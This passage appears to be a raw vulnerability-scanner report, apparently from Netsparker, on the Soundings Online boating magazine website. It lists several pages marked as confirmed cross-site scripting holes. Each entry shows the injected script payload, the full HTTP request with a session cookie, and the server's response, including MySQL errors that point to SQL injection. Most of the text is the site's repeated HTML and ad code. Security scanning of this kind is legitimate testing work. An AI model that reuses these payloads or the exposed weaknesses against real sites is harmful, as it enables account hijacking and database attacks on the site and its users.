href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</span></a></li></ul></li><li class="parent item80"><a href="#"><span>More</span></a><ul><li class="item110"><a href="/advertise"><span>Advertise</span></a></li><li class="item122"><a href="/more/the-masters-series"><span>The Master's Series</span></a></li><li class="item66"><a href="/more/digital-publications"><span>Digital P..
- /component/content/article/272182/272182

/component/content/article/272182/272182 CONFIRMED

http://www.soundingsonline.com/component/content/article/272182/272182?'%22--%3E%3C/style%3E%3C/scri..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0023E7)</script>

Request

GET /component/content/article/272182/272182?'"--></style></script><script>netsparker(0x0023E7)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:36:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:36:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0023E7)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0023E7)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/component/content/article/272182/272182" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Print magazine January 2011
Boat auction
Auction
F.Todd Warner
Wooden boats" /> <meta name="title" content="Going once, going twice ..." /> <meta name="author" content="Jim Flannery" /> <meta name="description" content="Wooden-boat aficionado F. Todd Warner auctioned off most of his collection of classics this fall, though he might end up restoring some of them for their new owners." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Going once, going twice ...</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_features c_uncategorized m_uncategorized"><!--
Type of page: article<br />Section: 5, s_features<br />Category: 99, c_uncategorized<br />Menu: , m_uncategorized-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</span></a></li></ul></li><li class="parent item80"><a href="#"><span>More</span></a><ul><li class="item110"><a href="/advertise"><span>Advertise</span></a></li><li class="item122"><a href="/more/the-masters-series"><span>The Master's Series</span></a></li><li class="item66"><a href="/more/digital-publications"><span>Digital Publications</span></a></li><li class="item104"><a href="/archives"><span>Archives</span>..
- /component/content/article/272182/

/component/content/article/272182/ CONFIRMED

http://www.soundingsonline.com/component/content/article/272182/?'%22--%3E%3C/style%3E%3C/script%3E%..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0023E5)</script>

Request

GET /component/content/article/272182/?'"--></style></script><script>netsparker(0x0023E5)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/component/content/article/272182/272182
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:36:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:36:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0023E5)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0023E5)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/component/content/article/272182/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Print magazine January 2011
Boat auction
Auction
F.Todd Warner
Wooden boats" /> <meta name="title" content="Going once, going twice ..." /> <meta name="author" content="Jim Flannery" /> <meta name="description" content="Wooden-boat aficionado F. Todd Warner auctioned off most of his collection of classics this fall, though he might end up restoring some of them for their new owners." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Going once, going twice ...</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_features c_uncategorized m_uncategorized"><!--
Type of page: article<br />Section: 5, s_features<br />Category: 99, c_uncategorized<br />Menu: , m_uncategorized-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</span></a></li></ul></li><li class="parent item80"><a href="#"><span>More</span></a><ul><li class="item110"><a href="/advertise"><span>Advertise</span></a></li><li class="item122"><a href="/more/the-masters-series"><span>The Master's Series</span></a></li><li class="item66"><a href="/more/digital-publications"><span>Digital Publications</span></a></li><li class="item104"><a href="/archives"><span>Archives</span></..
- /boat-shop/used-boat-review/272562-irwin-43-mk-ii

/boat-shop/used-boat-review/272562-irwin-43-mk-ii CONFIRMED

http://www.soundingsonline.com/boat-shop/used-boat-review/272562-irwin-43-mk-ii?'%22--%3E%3C/style%3..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0023F1)</script>

Request

GET /boat-shop/used-boat-review/272562-irwin-43-mk-ii?'"--></style></script><script>netsparker(0x0023F1)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:36:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:36:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0023F1)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0023F1)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/boat-shop/used-boat-review/272562-irwin-43-mk-ii" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Print magazine January 2011
